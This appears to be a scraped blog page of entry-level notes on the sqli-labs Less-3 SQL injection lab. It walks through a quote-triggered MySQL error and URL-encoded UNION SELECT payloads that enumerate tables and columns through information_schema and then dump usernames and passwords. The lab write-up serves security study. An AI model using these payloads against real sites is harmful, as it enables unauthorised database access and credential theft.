当前位置:网站首页>Sqlilabs-3 (entry notes)
Sqlilabs-3 (entry notes)
2022-07-28 23:02:00 【X also total】
Before that, observe mysql Execute the following command on the database :
Then :
So far, we have found , This id There are already three forms , Integer type / ‘’ / (‘’)
We can construct the corresponding payload
①: direct ?id=’ Prompt will pop up
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
Because it means sql The query statement uses :Select login_name, select password from table where id= (‘our input here’)
②: Start construction payload:
?id=-1%27)%20union%20select%201,database(),3--+ ( Gather information )
③: Starting basis mysql High version feature injection :
?id=-1%27)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+
?id=-1%27)union%20select%201,group_concat(username),group_concat(password)%20from%20security.users--+
边栏推荐
- Evaluation index of anomaly detection: rocauc et al. [tips]
- Configuration and official document of Freia library [tips]
- cannot resize variables that require grad
- Wheel 6: qserialport serial port data transceiver
- CGLIb 创建代理
- Anaconda environment installation skimage package
- 芯华章宣布完成超2亿A轮融资,全面布局EDA2.0研发
- Learning experience sharing 5: yolov5 dataset division and Yolo format conversion
- 无代码开发平台通讯录入门教程
- LTE cell search process and sch/bch design
猜你喜欢
![Draem+sspcab [anomaly detection: block]](/img/97/75ce235c2021b56007eecb82afe4b0.png)
Draem+sspcab [anomaly detection: block]

Improvement 13 of yolov5: replace backbone network C3 with lightweight network efficientnetv2

can‘t convert cuda:0 device type tensor to numpy. Use Tensor. cpu() to copy the tensor to host memory

B站713故障后的多活容灾建设|TakinTalks大咖分享

Cglib create proxy

Record a question about the order of trigonometric function exchange integrals

无代码开发平台管理后台入门教程

Target detection notes -yolo

18 diagrams, intuitive understanding of neural networks, manifolds and topologies

console.log()控制台显示...解决办法
随机推荐
[3D target detection] 3dssd (II)
OSV_ Q write divergence operator div and Laplace stepped on the pit
Draem+sspcab [anomaly detection: block]
OSV-q The size of tensor a (3) must match the size of tensor b (320) at non-singleton dimension 3
Wheel 7: TCP client
hp proliant dl380从U盘启动按哪个键
《结构学》介绍
2020年国内十大IC设计企业曝光!这五大产业挑战仍有待突破!
Cglib create proxy
recursion and iteration
console.log()控制台显示...解决办法
Written questions and answers of software test interview (software test question bank)
Console.log() console display... Solution
Invest 145billion euros! EU 17 countries announce joint development of semiconductor technology
Empowering Chinese core entrepreneurs! See how Moore elite solves the development problems of small and medium-sized chip Enterprises
Lenovo r9000p installation matlab2018a+cuda10.0 compilation
Is 1E3 a floating point number?
递归和迭代
Padim [anomaly detection: embedded based]
[database]